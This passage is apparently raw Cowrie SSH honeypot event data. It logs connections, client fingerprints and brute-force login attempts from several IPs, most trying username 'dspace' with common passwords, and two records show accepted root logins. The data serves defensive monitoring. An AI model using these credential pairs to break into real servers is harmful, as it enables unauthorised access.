2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:57:24.979156Z","src_ip":"212.227.235.229","session":"beff0a21dc93"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"admin123","message":"login attempt [dspace/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:57:30.711791Z","src_ip":"212.227.235.229","session":"beff0a21dc93"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:57:32.699622Z","src_ip":"212.227.235.229","session":"beff0a21dc93"}
{"eventid":"cowrie.session.closed","duration":31.475375413894653,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:57:37.985375Z","src_ip":"220.80.101.41","session":"d8dfbe55aef8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33060,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb4562aeb5c9","protocol":"ssh","message":"New connection: 212.227.125.160:33060 (1.2.3.4:22) [session: eb4562aeb5c9]","sensor":"my-vps","timestamp":"2025-08-31T01:57:46.021577Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:57:46.672700Z","src_ip":"212.227.125.160","session":"eb4562aeb5c9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:57:46.673400Z","src_ip":"212.227.125.160","session":"eb4562aeb5c9"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"admin123","message":"login attempt [dspace/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:57:49.246107Z","src_ip":"212.227.125.160","session":"eb4562aeb5c9"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:57:50.782573Z","src_ip":"212.227.125.160","session":"eb4562aeb5c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52218,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd7c728d0cb5","protocol":"ssh","message":"New connection: 212.227.235.229:52218 (1.2.3.4:22) [session: bd7c728d0cb5]","sensor":"my-vps","timestamp":"2025-08-31T01:58:26.444600Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:58:27.442758Z","src_ip":"212.227.235.229","session":"bd7c728d0cb5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:58:27.443565Z","src_ip":"212.227.235.229","session":"bd7c728d0cb5"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"root123","message":"login attempt [dspace/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:58:33.656181Z","src_ip":"212.227.235.229","session":"bd7c728d0cb5"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:58:35.571243Z","src_ip":"212.227.235.229","session":"bd7c728d0cb5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43094,"dst_ip":"1.2.3.4","dst_port":22,"session":"c986954c9abb","protocol":"ssh","message":"New connection: 212.227.125.160:43094 (1.2.3.4:22) [session: c986954c9abb]","sensor":"my-vps","timestamp":"2025-08-31T01:58:49.310491Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:58:49.630243Z","src_ip":"212.227.125.160","session":"c986954c9abb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:58:49.631263Z","src_ip":"212.227.125.160","session":"c986954c9abb"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"root123","message":"login attempt [dspace/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:58:51.258380Z","src_ip":"212.227.125.160","session":"c986954c9abb"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:58:52.580855Z","src_ip":"212.227.125.160","session":"c986954c9abb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:59:17.078335Z","src_ip":"176.65.149.186","session":"bfdbfee4b364"}
{"eventid":"cowrie.session.closed","duration":180.06746244430542,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:59:17.083180Z","src_ip":"176.65.149.186","session":"bfdbfee4b364"}
{"eventid":"cowrie.session.connect","src_ip":"115.190.94.119","src_port":33100,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6b3c793d0d6","protocol":"ssh","message":"New connection: 115.190.94.119:33100 (1.2.3.4:22) [session: a6b3c793d0d6]","sensor":"my-vps","timestamp":"2025-08-31T01:59:17.979847Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:59:17.980822Z","src_ip":"115.190.94.119","session":"a6b3c793d0d6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:59:18.177139Z","src_ip":"115.190.94.119","session":"a6b3c793d0d6"}
{"eventid":"cowrie.login.success","username":"root","password":"Li147258","message":"login attempt [root/Li147258] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:59:19.003412Z","src_ip":"115.190.94.119","session":"a6b3c793d0d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33740,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6ea43dedfb8","protocol":"ssh","message":"New connection: 212.227.235.229:33740 (1.2.3.4:22) [session: f6ea43dedfb8]","sensor":"my-vps","timestamp":"2025-08-31T01:59:29.059587Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:59:29.789242Z","src_ip":"212.227.235.229","session":"f6ea43dedfb8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:59:29.789930Z","src_ip":"212.227.235.229","session":"f6ea43dedfb8"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"P@ssw0rd123","message":"login attempt [dspace/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:59:35.559909Z","src_ip":"212.227.235.229","session":"f6ea43dedfb8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48942,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b2b484ace1f","protocol":"ssh","message":"New connection: 212.227.125.160:48942 (1.2.3.4:22) [session: 2b2b484ace1f]","sensor":"my-vps","timestamp":"2025-08-31T01:59:36.675528Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:59:36.679532Z","src_ip":"212.227.125.160","session":"2b2b484ace1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49245,"dst_ip":"1.2.3.4","dst_port":22,"session":"2813ec849832","protocol":"ssh","message":"New connection: 212.227.125.160:49245 (1.2.3.4:22) [session: 2813ec849832]","sensor":"my-vps","timestamp":"2025-08-31T01:59:36.805233Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:59:36.805973Z","src_ip":"212.227.125.160","session":"2813ec849832"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T01:59:36.931458Z","src_ip":"212.227.125.160","session":"2813ec849832"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:59:37.387535Z","src_ip":"212.227.235.229","session":"f6ea43dedfb8"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:59:38.578124Z","src_ip":"212.227.125.160","session":"2813ec849832"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T01:59:38.703117Z","session":"2813ec849832"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52352,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c927aa58981","protocol":"ssh","message":"New connection: 212.227.125.160:52352 (1.2.3.4:22) [session: 0c927aa58981]","sensor":"my-vps","timestamp":"2025-08-31T01:59:50.723907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:59:51.501980Z","src_ip":"212.227.125.160","session":"0c927aa58981"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:59:51.503133Z","src_ip":"212.227.125.160","session":"0c927aa58981"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"P@ssw0rd123","message":"login attempt [dspace/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:59:53.689488Z","src_ip":"212.227.125.160","session":"0c927aa58981"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:59:55.168929Z","src_ip":"212.227.125.160","session":"0c927aa58981"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42542,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6c341615510","protocol":"ssh","message":"New connection: 212.227.235.229:42542 (1.2.3.4:22) [session: c6c341615510]","sensor":"my-vps","timestamp":"2025-08-31T02:00:30.682223Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:00:31.817086Z","src_ip":"212.227.235.229","session":"c6c341615510"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:00:31.817940Z","src_ip":"212.227.235.229","session":"c6c341615510"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"letmein","message":"login attempt [dspace/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T02:00:37.679517Z","src_ip":"212.227.235.229","session":"c6c341615510"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:00:39.526312Z","src_ip":"212.227.235.229","session":"c6c341615510"}
{"eventid":"cowrie.session.connect","src_ip":"115.190.94.119","src_port":36856,"dst_ip":"1.2.3.4","dst_port":22,"session":"45e79e0986c5","protocol":"ssh","message":"New connection: 115.190.94.119:36856 (1.2.3.4:22) [session: 45e79e0986c5]","sensor":"my-vps","timestamp":"2025-08-31T02:00:45.273039Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T02:00:45.274264Z","src_ip":"115.190.94.119","session":"45e79e0986c5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T02:00:45.480476Z","src_ip":"115.190.94.119","session":"45e79e0986c5"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"123qweQWE","message":"login attempt [deploy/123qweQWE] failed","sensor":"my-vps","timestamp":"2025-08-31T02:00:46.346757Z","src_ip":"115.190.94.119","session":"45e79e0986c5"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:00:46.802348Z","src_ip":"212.227.125.160","session":"2813ec849832"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33404,"dst_ip":"1.2.3.4","dst_port":22,"session":"d66a4d1b7b02","protocol":"ssh","message":"New connection: 212.227.125.160:33404 (1.2.3.4:22) [session: d66a4d1b7b02]","sensor":"my-vps","timestamp":"2025-08-31T02:00:53.182586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:00:53.738257Z","src_ip":"212.227.125.160","session":"d66a4d1b7b02"}
